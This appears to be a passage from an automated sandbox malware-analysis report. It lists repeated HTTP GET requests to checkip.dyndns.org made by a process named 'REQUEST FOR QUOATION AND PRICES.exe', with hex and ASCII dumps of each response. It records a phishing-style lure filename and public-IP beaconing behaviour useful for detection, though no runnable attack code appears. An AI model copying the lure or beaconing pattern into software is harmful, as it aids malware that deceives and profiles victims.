                                                                                                                              0192.168.2.749802132.226.247.73807616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 3, 2024 15:22:49.154123068 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 3, 2024 15:22:50.551172018 CET321INHTTP/1.1 200 OK
                                                                                                                              Date: Tue, 03 Dec 2024 14:22:50 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: e0205ddc3b11a4c3ba0e9f3285efc076
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
                                                                                                                              Dec 3, 2024 15:22:50.555913925 CET127OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Dec 3, 2024 15:22:51.015388012 CET321INHTTP/1.1 200 OK
                                                                                                                              Date: Tue, 03 Dec 2024 14:22:50 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: 819865acb5e821cdc5cbbc835333b7e9
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
                                                                                                                              Dec 3, 2024 15:22:59.094218969 CET127OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Dec 3, 2024 15:22:59.545706034 CET321INHTTP/1.1 200 OK
                                                                                                                              Date: Tue, 03 Dec 2024 14:22:59 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: 299781da1742728469d4ee64c6c74c98
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              1192.168.2.749838132.226.247.73807616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 3, 2024 15:23:02.797209978 CET127OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Dec 3, 2024 15:23:04.279830933 CET321INHTTP/1.1 200 OK
                                                                                                                              Date: Tue, 03 Dec 2024 14:23:04 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: dd11c3337c3d27caeb06c360de8f8492
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              2192.168.2.749850132.226.247.73807616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 3, 2024 15:23:06.543308020 CET127OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Dec 3, 2024 15:23:07.970480919 CET321INHTTP/1.1 200 OK
                                                                                                                              Date: Tue, 03 Dec 2024 14:23:07 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: 36326bff282fe220f45ee61e3c74b25e
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              3192.168.2.749858132.226.247.73807616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 3, 2024 15:23:10.276627064 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 3, 2024 15:23:11.840050936 CET321INHTTP/1.1 200 OK
                                                                                                                              Date: Tue, 03 Dec 2024 14:23:11 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: cd837b793f697cf4b5d7cb6900030216
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              4192.168.2.749869132.226.247.73807616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 3, 2024 15:23:14.043550968 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 3, 2024 15:23:15.348351002 CET321INHTTP/1.1 200 OK
                                                                                                                              Date: Tue, 03 Dec 2024 14:23:15 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: 846bc5a515aaa3b26975886b438ccf9d
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              5192.168.2.749881132.226.247.73807616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 3, 2024 15:23:18.019983053 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 3, 2024 15:23:19.711443901 CET321INHTTP/1.1 200 OK
                                                                                                                              Date: Tue, 03 Dec 2024 14:23:19 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: 0749d1a4e894ece083d39a0fdb4d52a9
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              6192.168.2.749888132.226.247.73807616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 3, 2024 15:23:22.031601906 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 3, 2024 15:23:23.410410881 CET321INHTTP/1.1 200 OK
                                                                                                                              Date: Tue, 03 Dec 2024 14:23:23 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: 7bc4f15b7a3bb7b37ee3bd1bc5372aa0
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              7192.168.2.749900132.226.247.73807616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 3, 2024 15:23:25.730920076 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 3, 2024 15:23:27.034535885 CET321INHTTP/1.1 200 OK
                                                                                                                              Date: Tue, 03 Dec 2024 14:23:26 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: 8073028460be049eba4b373a12e0a83c
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              8192.168.2.749908132.226.247.73807616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 3, 2024 15:23:29.479759932 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 3, 2024 15:23:30.923572063 CET321INHTTP/1.1 200 OK
                                                                                                                              Date: Tue, 03 Dec 2024 14:23:30 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: f1dbf4eb7c49f4feee16cbf5b7ad2d5f
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              9192.168.2.749919132.226.247.73807616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 3, 2024 15:23:34.131933928 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 3, 2024 15:23:35.436189890 CET321INHTTP/1.1 200 OK
                                                                                                                              Date: Tue, 03 Dec 2024 14:23:35 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: c2062d12c454c090187f940a539788f5
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              10192.168.2.749931132.226.247.73807616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 3, 2024 15:23:37.704580069 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 3, 2024 15:23:39.064112902 CET321INHTTP/1.1 200 OK
                                                                                                                              Date: Tue, 03 Dec 2024 14:23:38 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: a792116092e6d857942b6816aaa72a30
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              11192.168.2.749939132.226.247.73807616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 3, 2024 15:23:41.321688890 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 3, 2024 15:23:42.626117945 CET321INHTTP/1.1 200 OK
                                                                                                                              Date: Tue, 03 Dec 2024 14:23:42 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: 6f8a3f2d86a3ec37e1e5d4d7dc9c33ad
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              12192.168.2.749948132.226.247.73807616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 3, 2024 15:23:44.984883070 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 3, 2024 15:23:46.335513115 CET321INHTTP/1.1 200 OK
                                                                                                                              Date: Tue, 03 Dec 2024 14:23:46 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: f9cfbad74ae74c9083f1f83a169f6f50
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              13192.168.2.749956132.226.247.73807616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 3, 2024 15:23:48.609688997 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 3, 2024 15:23:50.005939960 CET321INHTTP/1.1 200 OK
                                                                                                                              Date: Tue, 03 Dec 2024 14:23:49 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: 1bb811b2ead947cb2badaaabcd6bc73e
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              14192.168.2.749966132.226.247.73807616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 3, 2024 15:23:52.160885096 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 3, 2024 15:23:53.559438944 CET321INHTTP/1.1 200 OK
                                                                                                                              Date: Tue, 03 Dec 2024 14:23:53 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: 73af3106b132adff46c63a77f16344b8
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              15192.168.2.749973132.226.247.73807616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 3, 2024 15:23:55.829879045 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 3, 2024 15:23:57.136209011 CET321INHTTP/1.1 200 OK
                                                                                                                              Date: Tue, 03 Dec 2024 14:23:56 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: a915e937438b2400fbace04beac8e2eb
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              16192.168.2.749979132.226.247.73807616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 3, 2024 15:23:59.561739922 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 3, 2024 15:24:00.913367987 CET321INHTTP/1.1 200 OK
                                                                                                                              Date: Tue, 03 Dec 2024 14:24:00 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: a8adcb12402692be74529beabd2b1ed0
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                              17192.168.2.749981132.226.247.7380
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 3, 2024 15:24:05.423635960 CET151OUTGET / HTTP/1.1
